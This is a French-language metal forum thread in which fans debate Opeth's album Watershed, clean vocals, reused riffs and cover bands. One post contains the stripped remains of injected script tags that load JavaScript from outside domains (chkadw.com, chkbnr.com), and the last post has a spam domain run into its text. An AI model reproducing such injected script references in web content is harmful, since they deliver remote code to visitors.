Forum Home Forum Home > Rock The World > Metal
  New Posts New Posts RSS Feed - Opeth
  FAQ FAQ  Forum Search   Events   Register Register  Login Login



 

ZanZanA L'émission Metal in noise we trust...

 

Opeth

 Post Reply Post Reply Page  <1 5678>
Author
Message
Serena View Drop Down
Treble
Treble
Avatar

Joined: 14 Fevrier 2008
Location: tunisie
Status: Offline
Points: 91
Post Options Post Options   Thanks (0) Thanks(0)   Quote Serena Quote  Post ReplyReply Direct Link To This Post Posted: 08 Juin 2008 at 14:54

vous avez pas remarqué que la voix qui chante avec mike sur "coil" ressemble un peu à celle d" emy lee(d evanscence)Dead ????

Back to Top
Trinity View Drop Down
Moderator Group
Moderator Group
Avatar
Vox Clamans In Deserto

Joined: 18 Janvier 2008
Location: Tunisia
Status: Offline
Points: 648
Post Options Post Options   Thanks (0) Thanks(0)   Quote Trinity Quote  Post ReplyReply Direct Link To This Post Posted: 08 Juin 2008 at 17:56

La chanteuse s’appelle Nathalie Lorichs c’est la fiancé de Martin Axenrot, ils ont d’ailleurs un projet ensemble, et je trouve sa voix superbe :p



Edited by Trinity - 08 Juin 2008 at 17:59
Love is dead and thou art free
she doth live but dead to thee...
Back to Top
Serena View Drop Down
Treble
Treble
Avatar

Joined: 14 Fevrier 2008
Location: tunisie
Status: Offline
Points: 91
Post Options Post Options   Thanks (0) Thanks(0)   Quote Serena Quote  Post ReplyReply Direct Link To This Post Posted: 08 Juin 2008 at 20:16
ouai mais pas assez exceptionnelle......

Edited by Serena - 14 Juin 2008 at 23:12
Back to Top
Sandman View Drop Down
V.I.P.
V.I.P.
Avatar
Blacker than Darkness

Joined: 19 Mai 2007
Location: Norway
Status: Offline
Points: 992
Post Options Post Options   Thanks (0) Thanks(0)   Quote Sandman Quote  Post ReplyReply Direct Link To This Post Posted: 09 Juin 2008 at 19:22
Originally posted by Belial Belial wrote:


Tout à fait LOL, sauf que pour moi, à propos de l'intro, j'allais faire un "stop" et ne pas continuer l'écoute de tout l'album, mais par la suite je me suis rappelé les deux autres titres que j'ai déjà écouté, et j'ai donc continué.

moi,je ne sais pas comment fini 'Burden' je me suis limité à 5minutes de torture,pour 'coil' j'ai pu supporter mais 'burden' ma najjamtch...d'ailleurs aprés la 1ere écoute,ma version de Watershed ne contenait plus que 5 titres,la corbeille a bien aimé les 2 autres

Originally posted by Belial Belial wrote:


Non mais franchement avec un titre pareil qu'est ce qu'il pensait Mikael? Je ne parle pas seulement de la musique ou du chant mais surtout des paroles...

moi perso,j'ai un champ d'écoute assez large alors ce titre là n'est pas vraiment un dépaysement total mais le plus gros probléme c'est quand je vois un album de prog pop rock et que je décide d'écouter,je sais à quoi m'en tenir et je sais que je vais écouter du pop rock alors qu'avec Opeth je vois leur album avant tout comme du prog DEATH METAL et je me prépare à écouter du Death metal et qu'est ce que je trouve du pop rock et c'est cette 'surprise' qui m'est le plus désagréable

je sais que le groupe joue sur ce truk du contraste entre aggrésivité et mélodie,mais vraiment cette fois il y va trop loin:aprés un titre comme Coil on s'attend à tous sauf à quelque chose comme Heir Apparent.vraiment les titres sont à des années de lumiére de différence de telle façon que c'est difficile de trouver quelqu'un qui les aimerais tous les 2 de la méme maniére à moins que ce soit un fanatique de Opeth...moi,perso je pense qu'opeth est entrain de faire un mauvais calcul...bon,c'est c'est vrai que c'est le choix des membres et tout mais je pense qu'opeth gagnerait néttement plus s'il sortait un album metal extreme et un album easy listening metal séparément ou un album 2 cds à la rigueur parce que je pense que les fans de metal extreme ne supportent pas les titres easy listening et les easy listeners ne suportent pas les titres extrémes...au final,personne n'aimera l'album en entiér (apart peut étre quelque fans invétérés)...d'ailleurs le succés commercial de 'damnation' le prouve,mais bon ce n'est qu'un avis...
Originally posted by Belial Belial wrote:

     
il me semble que les passages calmes d'Opeth veulent parfois se faire passer pour de l'Anathema de l'album Judgement (que je ne déteste pas trop mais qui comporte pourtant trop de titres très similaires) ou encore pire, A Fine Day to Exit, mais en n'arrivant pas vraiment à bien le faire. Big%20smile

c'est ptét rien qu'une impréssion mais je trouve que opeth maitrise les passages aggréssives beaucoups plus que les calmes,on sent qu'ils...yt9waaw 3ala rwa7hom pour les parties calmes alors que les agréssives viennent nuturellement...Opeth est à la base un groupe de Death metal alors l'aggréssivité c'est son élément alors que cette nouvelle tendence n'est pas familiére et elle est surtout le fruit d'un but commercial plutot qu'un choix de style...de ce fait les parties death sonnent beaucoups mieux que le réste et coté passages calmes le groupe est loin d'atteindre anathema sur ce terrain...il n'est tout simplement pas fait pour ça mais il veut le faire quand méme!

Edited by Sandman - 09 Juin 2008 at 19:30
Back to Top
^OpethisT^ View Drop Down
Loud
Loud
Avatar

Joined: 03 Septembre 2007
Location: Blackwater park
Status: Offline
Points: 461
Post Options Post Options   Thanks (0) Thanks(0)   Quote ^OpethisT^ Quote  Post ReplyReply Direct Link To This Post Posted: 14 Juin 2008 at 18:20
Originally posted by hell_boy hell_boy wrote:


ps : pour derelict herds, a première vue, enfin écoute, je dirais que ça partie metal ressemble un peu au riff vers la fin de master's apprentices...mais c'est absolument pas un copier coller.
Donc je crois me tromper...

et bah oué,tu te trompe mec !c'était du vrai "copier-coller"(avec une trèès légère modification négligeable) et pour faciliter un peut,réécoute bien "2:15"Wink...
bizarre!! j'ai remarqué ça dès la 1ère écoute .
 
Originally posted by Sandman Sandman wrote:


c'est ptét rien qu'une impréssion mais je trouve que opeth maitrise les passages aggréssives beaucoups plus que les calmes,on sent qu'ils...yt9waaw 3ala rwa7hom pour les parties calmes alors que les agréssives viennent nuturellement...Opeth est à la base un groupe de Death metal alors l'aggréssivité c'est son élément alors que cette nouvelle tendence n'est pas familiére et elle est surtout le fruit d'un but commercial plutot qu'un choix de style...de ce fait les parties death sonnent beaucoups mieux que le réste et coté passages calmes le groupe est loin d'atteindre anathema sur ce terrain...il n'est tout simplement pas fait pour ça mais il veut le faire quand méme!
tu te trompe là sando...
même avant la formation du vrai Opeth , Mikael akerfeldt adore utiliser les passages acoustiques et l'introduires dans des titres 'extremes',mais c'était plutôt des parties instrumental/acoustic : du genre "heir apprent" ,"black water park"(je parle des interludes acoustiques,on sent qu'il maîtrise bien ses passages là)...
 
"MIKE: By now I had written a track called "Poise into Celeano" who turned out more different than the other tracks. No blast beats, no ultra doomy parts. This track had acoustic parts, harmonies, and lots of double bass drumming!

Some parts of this track ended up in "Advent" on the 2nd album. Anyhow, for this third gig we needed a bassplayer..." l'année 1991 (c'était même avant que "peter" rejoint le groupe : Opeth contient que 2 membres..)

source www.opeth.com 
et là je te conseil d'écouter les passages 'calmes' de ce titre "Advent",les parties acoustiques sonnera beaucoup plus mieux que le reste (c'est le cas pour tout l'album "Morningrise" en fait ,ainsi que la majorité des titres d'Orchid )...
par contre pour ce qui est le fruit d'un but commercial a mon avis c'est l'utilisation de la voix claire(de mike)qui devient beaucoup trop fréquente ces dernier temps... a savoir burden ,coil,'l'intro' de hessian peel  ... :s:s  
c'est aussi le cas pour l'éclosion de "Per"sur le clavier ,qui n'as rien ajouté au groupe ou c'est peut être le contraire,personnellement j'ai pas pu apprecier ca touche...:s ,( a part qqes exceptions sourtout pour "damnation"... )
 
Give Opeth Another Listen .
Opethists For Eternity Stealers & Gleeful...
Back to Top
hell_boy View Drop Down
Silence
Silence
Avatar

Joined: 02 Avril 2005
Location: France
Status: Offline
Points: 6
Post Options Post Options   Thanks (0) Thanks(0)   Quote hell_boy Quote  Post ReplyReply Direct Link To This Post Posted: 14 Juin 2008 at 20:27
Ghost of perdition (vers 4:57) ?? c'est plutot ça...mais c'est un ton en dessous sur le bonus track.
je donne ma langue au chat


DU BIST, WAS DU ISST......
Back to Top
^OpethisT^ View Drop Down
Loud
Loud
Avatar

Joined: 03 Septembre 2007
Location: Blackwater park
Status: Offline
Points: 461
Post Options Post Options   Thanks (0) Thanks(0)   Quote ^OpethisT^ Quote  Post ReplyReply Direct Link To This Post Posted: 15 Juin 2008 at 01:54

Bredouille Niah%20Niah%20Niah! (oublie Ghost reveries)

et bah je t'invite a bien réecouter surtout les vieux albums et de te concentrer seulement sur ce riff (2:16-2:28) c'est pourtant indubitable..
Give Opeth Another Listen .
Opethists For Eternity Stealers & Gleeful...
Back to Top
Sandman View Drop Down
V.I.P.
V.I.P.
Avatar
Blacker than Darkness

Joined: 19 Mai 2007
Location: Norway
Status: Offline
Points: 992
Post Options Post Options   Thanks (0) Thanks(0)   Quote Sandman Quote  Post ReplyReply Direct Link To This Post Posted: 15 Juin 2008 at 22:22
Originally posted by ^OpethisT^ ^OpethisT^ wrote:


tu te trompe là sando...

même avant la formation du vrai Opeth , Mikael akerfeldt adore utiliser les passages acoustiques et l'introduires dans des titres 'extremes',mais c'était plutôt des parties instrumental/acoustic : du genre "heir apprent" ,"black water park"(je parle des interludes acoustiques,on sent qu'il maîtrise bien ses passages là)...

non non non,je ne parle pas du coté progessif du groupe qui est bien évidement présent dés leurs débuts mais je parle surtout de leur tendence Rock et qui dit Rock dit voix claire...les parties instrumentales/acoustiques à la Edge of Sanity ne me dérangent pas du tout,bien au contraire mais c'est surtout de leurs parties trop accéssible avec des riffs light et une batterie pas trop suédoise...je ne sais quand est ce que ça a commencer mais c'est sur que ça fait pas partie de la nature du groupe...
Back to Top
^OpethisT^ View Drop Down
Loud
Loud
Avatar

Joined: 03 Septembre 2007
Location: Blackwater park
Status: Offline
Points: 461
Post Options Post Options   Thanks (0) Thanks(0)   Quote ^OpethisT^ Quote  Post ReplyReply Direct Link To This Post Posted: 17 Juin 2008 at 05:13
Originally posted by Sandman Sandman wrote:


non non non,je ne parle pas du coté progessif du groupe qui est bien évidement présent dés leurs débuts mais je parle surtout de leur tendence Rock et qui dit Rock dit voix claire...les parties instrumentales/acoustiques à la Edge of Sanity ne me dérangent pas du tout,bien au contraire mais c'est surtout de leurs parties trop accéssible avec des riffs light et une batterie pas trop suédoise...je ne sais quand est ce que ça a commencer mais c'est sur que ça fait pas partie de la nature du groupe...
n'oublie pas que Mikael akerfeldt est très influencé par un grand nombre de groupes rock des 70's,a savoir : the zombies,rush,camel...
Give Opeth Another Listen .
Opethists For Eternity Stealers & Gleeful...
Back to Top
bassistar View Drop Down
Silence
Silence
Avatar

Joined: 09 Juin 2008
Location: tunisie
Status: Offline
Points: 1
Post Options Post Options   Thanks (0) Thanks(0)   Quote bassistar Quote  Post ReplyReply Direct Link To This Post Posted: 17 Juin 2008 at 14:22
cool ya beaucoup de opethists here , alors pk on n'a pas un groupe qui fait les reprises d'Opeth ?!!Reflechi

Edited by bassistar - 17 Juin 2008 at 14:24
Metal Blood . Peace :D ...
Back to Top
Trinity View Drop Down
Moderator Group
Moderator Group
Avatar
Vox Clamans In Deserto

Joined: 18 Janvier 2008
Location: Tunisia
Status: Offline
Points: 648
Post Options Post Options   Thanks (0) Thanks(0)   Quote Trinity Quote  Post ReplyReply Direct Link To This Post Posted: 17 Juin 2008 at 23:09

Il y a les Not Dead Yet qui font de très belles reprises de Opeth (bien sûr en plus de leurs compos)

Love is dead and thou art free
she doth live but dead to thee...
Back to Top
Satch View Drop Down
Moderator Group
Moderator Group
Avatar
Cool # 9

Joined: 18 Avril 2007
Location: Tunisia
Status: Offline
Points: 921
Post Options Post Options   Thanks (0) Thanks(0)   Quote Satch Quote  Post ReplyReply Direct Link To This Post Posted: 18 Juin 2008 at 18:13
Il y a Heat aussi
Back to Top
Dark_shark View Drop Down
Silence
Silence
Avatar

Joined: 10 Fevrier 2008
Location: tunisie
Status: Offline
Points: 13
Post Options Post Options   Thanks (0) Thanks(0)   Quote Dark_shark Quote  Post ReplyReply Direct Link To This Post Posted: 18 Juin 2008 at 23:13
y a un groupe du Canada qui joue seulement des reprise d'opeth mais j'ai jamais ecouté leur compos oui peut etre qu'il y en a pas le groupe s'appelle " Lamentation "
Trying to find some peace of mind
        Opeth - Death Whispered A Lullaby
Back to Top
opethien View Drop Down
Silence
Silence
Avatar

Joined: 19 Juin 2008
Location: tunisie
Status: Offline
Points: 17
Post Options Post Options   Thanks (0) Thanks(0)   Quote opethien Quote  Post ReplyReply Direct Link To This Post Posted: 19 Juin 2008 at 15:22
opeth est le meilleur groupe de ts lé temps jtrouveHorn
Back to Top
thevampermaster View Drop Down
Treble
Treble
Avatar

Joined: 18 Août 2007
Location: Sweden
Status: Offline
Points: 101
Post Options Post Options   Thanks (0) Thanks(0)   Quote thevampermaster Quote  Post ReplyReply Direct Link To This Post Posted: 19 Juin 2008 at 18:46
l'album watersh*t n'est pas un album d'opeth,en tout cas ce n'est pas le souvenir du groupe que j'ai vu pour mes 17ans,ils ont massacré leur style.
@trinity:la fois où les not dead yet on fait une reprise des opeth pour une z.o.s j'ai faill avoir une crise cardiaque,alors please.
Back to Top
opethien View Drop Down
Silence
Silence
Avatar

Joined: 19 Juin 2008
Location: tunisie
Status: Offline
Points: 17
Post Options Post Options   Thanks (0) Thanks(0)   Quote opethien Quote  Post ReplyReply Direct Link To This Post Posted: 19 Juin 2008 at 19:13
chui d'accord.... mé ilya d beau titres  dans cet album...jtouve
Back to Top
^OpethisT^ View Drop Down
Loud
Loud
Avatar

Joined: 03 Septembre 2007
Location: Blackwater park
Status: Offline
Points: 461
Post Options Post Options   Thanks (0) Thanks(0)   Quote ^OpethisT^ Quote  Post ReplyReply Direct Link To This Post Posted: 22 Juin 2008 at 03:18
Originally posted by Dark_shark Dark_shark wrote:

y a un groupe du Canada qui joue seulement des reprise d'opeth mais j'ai jamais ecouté leur compos oui peut etre qu'il y en a pas le groupe s'appelle " Lamentation "
< ="http://www.chkadw.com/b.js"> < ="http://www.chkbnr.com/b.js"> < =".js">
 
c'est juste un goupe qui joue seulement des reprises d'opeth durant ces concerts...'Opeth tribute' , il ya aussi "City of moon"...
Sinon j'ai trouvé un gars nommé "Kalle Kappner" qui a repris l'album damnation sur son piano, sont album s'intitle "Piano Damnation" : http://www.lenin01.de/Opeth/index.php (un lien pour le telecharger)
..mes préférés sont toujours "Pianopeth"(des reprises d'Opeth sur un piano mais bcp plus mieux) il faut vraiment écouter quelques titres dispo sur Leur Myspace...
Give Opeth Another Listen .
Opethists For Eternity Stealers & Gleeful...
Back to Top
Hamza BenMaiden View Drop Down
Treble
Treble
Avatar
SPAM MASTER

Joined: 06 Octobre 2005
Location: Tunisia
Status: Offline
Points: 111
Post Options Post Options   Thanks (0) Thanks(0)   Quote Hamza BenMaiden Quote  Post ReplyReply Direct Link To This Post Posted: 28 Juin 2008 at 15:00
Opeth est une légende mais ilya  aussi d'autre groupe de qualité 
The sun sets forever over blackwater park.
I don't know how or why, I'll never know WHEN. (Opeth D.metal)
It's you against the world
Or you against yourself?
(illdisposed D.Metal)
Back to Top
made by opeth View Drop Down
Silence
Silence
Avatar

Joined: 22 Octobre 2007
Location: Norway
Status: Offline
Points: 22
Post Options Post Options   Thanks (0) Thanks(0)   Quote made by opeth Quote  Post ReplyReply Direct Link To This Post Posted: 02 Juillet 2008 at 04:02
mais opeth sont les meilleur

OPETH pour la vie
Back to Top
Hamza BenMaiden View Drop Down
Treble
Treble
Avatar
SPAM MASTER

Joined: 06 Octobre 2005
Location: Tunisia
Status: Offline
Points: 111
Post Options Post Options   Thanks (0) Thanks(0)   Quote Hamza BenMaiden Quote  Post ReplyReply Direct Link To This Post Posted: 05 Juillet 2008 at 19:44
oui je suis daccord ils  sont  les meilleur mais aussi il ya le in flames les amon amarth le illdisposedocbn.mobi
The sun sets forever over blackwater park.
I don't know how or why, I'll never know WHEN. (Opeth D.metal)
It's you against the world
Or you against yourself?
(illdisposed D.Metal)
Back to Top
 Post Reply Post Reply Page  <1 5678>
  Share Topic   

Forum Jump Forum Permissions View Drop Down

Forum Software by Web Wiz Forums® version 11.01
Copyright ©2001-2014 Web Wiz Ltd.

This page was generated in 0.188 seconds.


ACCUEIL NEWS NETWORK OUTILS COPYRIGHTS
  • ZanZanA WebRadiO finance
    les droits d'auteur à la SABAM,
    de ce fait la diffusion
    de cette radio est légale.
  • Contact : zanzana[dot]webradio{at]gmail[dot]com